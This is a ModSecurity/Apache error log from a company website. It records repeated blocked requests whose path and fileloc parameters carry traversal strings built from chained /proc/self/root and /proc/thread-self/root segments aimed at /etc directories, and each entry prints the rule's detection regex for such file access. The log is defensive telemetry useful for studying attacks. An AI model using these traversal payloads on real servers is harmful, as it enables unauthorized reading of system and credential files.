[Wed Mar 18 09:05:00.143280 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:55346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU7Ow_le52K8_3pV3OpQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:01.699610 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:49130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU7ew_le52K8_3pV3OpwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:02.479495 2026] [:error] [pid 15051:tid 140411683178240] [client 216.73.216.191:43760] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU7imAPhZkrhU8w4lcFwAAAIc"]
[Wed Mar 18 09:05:02.485819 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:49130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU7uw_le52K8_3pV3OqgAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:03.597674 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:49350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU7-yqAr6etmhZHNqtLAAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 09:05:07.505605 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:49136] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU8wkwaGbbGflqUZD_oAAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:08.803131 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:49142] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU9CmAPhZkrhU8w4lcGQAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:10.234444 2026] [:error] [pid 17653:tid 140411674785536] [client 74.7.243.128:48022] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU9sdf6f5d65gmYZTDkQAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:12.637534 2026] [:error] [pid 17653:tid 140411691570944] [client 74.7.243.128:48038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU-Mdf6f5d65gmYZTDlwAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:13.972833 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.243.128:48042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU-cdf6f5d65gmYZTDmQAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:15.300083 2026] [:error] [pid 29882:tid 140411624429312] [client 74.7.243.128:48048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU-0zinOy1jxa1j4cCxQAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:16.615015 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:48060] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU_CmAPhZkrhU8w4lcHgAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:17.939408 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:48076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqU_cdf6f5d65gmYZTDmgAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:20.352288 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:48092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVAOw_le52K8_3pV3OuAAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:27.111308 2026] [:error] [pid 15051:tid 140411708356352] [client 74.7.243.128:41706] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVBymAPhZkrhU8w4lcNAAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:29.467544 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.241.31:34508] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVCeoXxyEfFpUF8f9dUwAAAVA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 09:05:29.528594 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:41712] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVCeyqAr6etmhZHNqtPAAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:30.894736 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:50604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVCuyqAr6etmhZHNqtPwAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:36.523892 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:50612] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVEMdf6f5d65gmYZTDpQAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:40.852865 2026] [:error] [pid 30077:tid 140411658000128] [client 74.7.243.128:50618] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVFPu8EFLIOrSqIpv0IgAAAko"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:05:42.150540 2026] [:error] [pid 29882:tid 140411666392832] [client 74.7.243.128:39856] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVFkzinOy1jxa1j4cC0wAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 09:06:01.955474 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:53632] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqVKeyqAr6etmhZHNqtXQAAAEo"], referer: 